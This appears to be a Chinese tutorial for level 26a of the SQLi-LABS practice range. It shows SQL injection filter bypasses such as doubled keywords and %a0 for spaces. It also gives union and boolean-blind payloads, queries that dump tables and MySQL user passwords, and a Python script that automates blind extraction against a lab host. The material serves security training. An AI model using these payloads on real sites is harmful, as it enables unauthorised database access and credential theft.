第26a关是单引号+括号的字符型注入;

后台过滤了关键字( and  or ),注释(/*  #  --  /),空格;

这篇文章提供联合注入、布尔盲注、两种解题方式。

SQLi LABS其他关卡可以参考:SQLi-LABS 靶场通关教程

一、功能分析

这关是一个查询功能,地址栏输入id作为参数,后台根据id查询用户信息,并在页面回显出来。

二、思路分析

1)过滤绕过

  • 针对注释(/*  #  --  /),可以使用引号闭合绕过。
  • 针对关键字( and  or ),可以使用双写绕过。
  • 针对空格,可以使用 %a0 绕过。

2)注入方式

参数中携带单引号时,页面空显示,很明显是隐藏了报错信息,不适合报错注入。

?id=1,?id=2,页面显示的用户信息不同,说明页面会动态回显数据库查询到的信息,可以考虑联合注入。

?id=1,页面正常显示;?id=0,页面异常(空)显示;说明正确的参数和错误的参数分别对应两种不同的响应结果,可以考虑布尔盲注。

三、解题步骤

接下来,提供三种解题的方式:

方式一:联合注入

联合注入的详细使用方式,可以参考我的另一篇文章:

联合注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1')anandd('1,页面正常显示

地址栏输入:?id=1')anandd('0,页面异常(空)显示

由此可以确定,注入点为:单引号+括号的字符型注入

第二步、判断显示位

地址栏输入:?id=0')union%a0select%a01,2,3%a0anandd('1

第三步、脱库

以当前使用的数据库为例,地址栏输入:

?id=0')union%a0select%a01,(database())
,3%a0anandd('

其余脱库操作时,将下面圈中的部分替换成SQL语句即可:

常用的脱库语句如下:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"# 获取数据库管理员用户密码
select%a0group_concat(user,passwoorrd)
from%a0mysql.user%a0where%a0user = "mituan"

方式二:布尔盲注

第一步、判断注入点

地址栏输入:?id=1')anandd('1,页面正常显示

地址栏输入:?id=1')anandd('0,页面异常(空)显示

第二步、判断长度

以当前使用的数据库为例,假设库名的长度大于1,地址栏输入:

?id=1')%a0anandd%a0length((database()))>1
%a0anandd('1

库名肯定大于1,所以页面正常显示,确定payload可用;

从1开始递增测试长度,稍后使用脚本测试。

第三步、枚举字符

截取库名的第一个字符,转换成ASCLL码,判断是否大于1,地址栏输入:

?id=1')%a0anandd%a0ascii(substr((database()),1,1))>1
%a0anandd('1

字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;

依次判断字符的ASCLL码是否等于(32~126);

枚举出第一个字符后,按照此方法枚举其他字符,为提高效率,稍后使用脚本枚举。

脱库

Python自动化猜解脚本如下,可按需修改:

import requests# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload# 目标网址(不带参数)
url = "http://2caf52448445428bb6107f7e6c0b67f4.app.mituan.zone/Less-26a/"
# 猜解长度使用的payload
payload_len = """?id=1')%a0anandd%a0length((database()))={n}
%a0anandd('1"""
# 枚举字符使用的payload
payload_str = """?id=1')%a0anandd%a0ascii(substr((database()),{l},1))={n}
%a0anandd('1"""# 获取长度
def getLength(url, payload):length = 1  # 初始测试长度为1while True:response = requests.get(url= url+payload_len.format(n= length))# 页面中出现此内容则表示成功if 'Your Login name' in response.text:print('测试长度完成,长度为:', length,)return length;else:print('正在测试长度:',length)length += 1  # 测试长度递增# 获取字符
def getStr(url, payload, length):str = ''  # 初始表名/库名为空# 第一层循环,截取每一个字符for l in range(1, length+1):# 第二层循环,枚举截取字符的每一种可能性for n in range(33, 126):response = requests.get(url= url+payload_str.format(l= l, n= n))# print('我正在猜解', n)# 页面中出现此内容则表示成功if 'Your Login name' in response.text:str+= chr(n)print('第', l, '个字符猜解成功:', str)break;return str;# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

执行结果是下面这样:

其余脱库操作时,将下面圈中的位置替换为SQL语句即可:

常用的脱库语句,请参考方式一末尾处(注意替换空格)。

SQLi LABS Less 26a 联合注入+布尔盲注相关推荐

  1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

    第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

  2. SQLi LABS Less 25a 联合注入+布尔盲注+时间盲注

    第25a关是数值型注入: 后台过滤了关键字(and.or),可以双写绕过: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. SQLi-LABS 其余关卡,可以参考我的专栏:SQLi-LABS ...

  3. SQLi LABS Less-13 报错注入+布尔盲注

    第十三关是单引号+括号的字符型注入,推荐使用报错注入.布尔盲注. 目录 一.功能分析 二.思路分析 三.解题步骤 方式一:报错注入 第一步.判断注入点 第二步.判断报错条件 第三步.脱库 方式二.布尔 ...

  4. SQLi LABS Less-6 报错注入+布尔盲注

    第六关是双引号字符型注入,推荐使用报错注入.布尔盲注 方式一:报错注入 推荐文章:报错注入使用详解,原理+步骤+实战教程 第一步.判断注入点 地址栏输入:?id=1" 页面显示数据库的报错信 ...

  5. SQLi LABS Less-5 报错注入+布尔盲注

    第五关是单引号字符型注入,推荐使用报错注入.布尔盲注 方式一:报错注入 推荐文章:报错注入使用详解,原理+步骤+实战教程 第一步.判断注入点 地址栏输入:?id=1' 单引号导致,页面显示数据库的报错 ...

  6. python实现sql宽字节注入+布尔盲注

    目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...

  7. sql注入--布尔盲注

    sql注入–布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect param ...

  8. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  9. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

最新文章

  1. SVN图标不能正常显示[转]
  2. 1.1 基本图像导入、处理和导出
  3. [mmu/cache]-Cache Type Register(CTR)寄存器介绍-InProgress
  4. RxJs Subject, AnonymousSubject, BehaviorSubject, ReplaySubject和AsyncSubject
  5. 3星|《增长黑客》:增长黑客是一个牵强的概念
  6. LINUX 文件夹打包
  7. DE21 Convolution Formula
  8. 在TextView中插入图片
  9. Linux下不停止服务,清空nohup.out文件
  10. 《逆袭进大厂》第二弹之C++进阶篇59问59答(超硬核干货)
  11. 在线式极限学习机OS-ELM
  12. html鼠标右键代码,Html鼠标右键菜单代码
  13. Win10禁用驱动签名,进入测试模式
  14. 直方图规定化(直方图匹配)
  15. 985计算机英语六级,大学英语六级比四级难多少?985学长含泪告诉你!
  16. 平板电脑装深度linux,在酷比魔方iWork10 Pro平板上装Deepin 20.1后触摸无反应的解决...
  17. 在线社交网络影响力分析——总结
  18. 该地发文,取得一级建造师等注册证书可直接考核认定高级工程师!
  19. nodejs+vue菜谱美食食谱网站系统
  20. 别树一帜的思维图软件:PersonalBrain(转)

热门文章

  1. Django的路由层
  2. 在Visual Studio 2017中找不到.NET Framework 4.6.2
  3. ListView的getFirstVisiblePosition等方法返回的是哪个对象
  4. 3-4笔刷的详细设定
  5. 获取客户端IP和MAC
  6. ASP.NET 常用的33种代码(转,收藏一下,以备后查)
  7. AndroidStudio_百度人脸识别离线SDK_代码分析_使用流程_随时更新---Android原生开发工作笔记217
  8. 大数据之-Hadoop之HDFS_HDFS的内容介绍---大数据之hadoop工作笔记0047
  9. Sharding-Sphere_分库分表小结和问题_Sharding-Sphere,Sharding-JDBC分布式_分库分表工作笔记005
  10. SpringCloud学习笔记008---杂七杂八002_spring 注解@Value详解_@Value(quot;#{}quot;)与@Value(quot;${}quot;)的区别